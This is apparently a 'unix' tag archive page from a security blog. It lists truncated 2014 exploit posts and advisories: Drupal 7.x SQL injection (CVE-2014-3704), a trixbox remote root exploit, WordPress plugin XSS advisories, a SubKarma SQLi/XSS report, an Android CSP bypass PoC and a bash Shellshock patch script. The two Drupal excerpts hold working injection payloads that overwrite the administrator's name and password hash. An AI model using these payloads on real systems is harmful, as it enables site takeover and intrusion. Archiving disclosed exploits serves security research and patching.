Tags archives: unix

 

0

Drupal Core 7.32 SQL Injection

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 #Creditz to https://www.reddit.com/user/fyukyuk import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print “host username password” print “http://nope.io admin wowsecure” hash = DrupalHash(“$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML”, password).get_hash() target = ‘%s/?q=node&destination=node’ % host post_data = “name[0%20;update+users+set+name%3d'" +user +"'+,+pass+%3d+'" [...]

 

0

Drupal Core 7.32 SQL Injection

<?php #—————————————————————————–# # Exploit Title: Drupal core 7.x – SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #—————————————————————————–#   $url = ‘http://www.example.com’; $post_data = “name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in”; [...]

 

0

Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl # # Title: Fonality trixbox CE remote root exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered & Coded: 2 June 2014 # Published: 17 October 2014 # MorXploit Research # http://www.MorXploit.com # Software: trixbox CE # Version: trixbox-2.8.0.4.iso # Vendor url: http://www.fonality.com/ # Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/ # Vulnerable file: maint/modules/home/index.php # # [...]

 

0

Drupal 7.X SQL Injection

#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk’s P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, [...]

 

0

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237 Product: MaxButtons WordPress plugin Vendor: Max Foundry Vulnerable Version(s): 1.26.0 and probably prior Tested Version: 1.26.0 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: October 2, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7181 Risk Level: Low CVSSv2 Base [...]

 

0

WordPress WP Google Maps 6.0.26 Cross Site Scripting

Advisory ID: HTB23236 Product: WP Google Maps WordPress plugin Vendor: WP Google Maps Vulnerable Version(s): 6.0.26 and probably prior Tested Version: 6.0.26 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: September 29, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7182 Risk Level: [...]

 

0

Mozilla browser mem disclosure bugs (CVE-2014-1580)

RIFERIMENTO: https://access.redhat.com/security/cve/CVE-2014-1580 CVE-2014-1580 Impatto: Moderate Pubblico: 2014-10-14 Bugzilla: 1152362: CVE-2014-1580 Mozilla: Further uninitialized memory use during GIF rendering (MFSA 2014-78) Public POC: First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that caused Firefox prior to version 33 (released today) to leak bits of uninitialized memory when rendering certain types of truncated images onto <canvas>. [...]

 

0

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA   # Risk: High   # CWE number: CWE-89,CWE-79   # Date: 13/10/2014   # Vendor: www.jttel.com.tw   # Author: Felipe ” Renzi ” Gabriel   # Contact: renzi@linuxmail.org   # Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906   # Vulnerables File: news.php ; [...]

 

0

ShellShock bash patch source

# www.mondounix.com – ShellShock bash patch source   mkdir /tmp/bash cd /tmp/bash   wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz   for i in $(seq -f “%03g” 0 30); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done   tar zxvf bash-4.3.tar.gz cd bash-4.3   for i in $(seq -f “%03g” 0 30);do patch -p0 < ../bash43-$i; done   ./configure   make   make install [...]

 

0

Android 4.4 CSP Bypass

I’ve found a Content Security Policy bypass similar and related to the same origin policy bypass in CVE-2014-6041. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041   I’ve tested this on an Android 4.3 tablet running a bunch of different browsers, including Inbrowser, Firefox, and the default Android browser on an emulator for Android 4.3.1.   HTML PoC:   <input type=button value=”test” [...]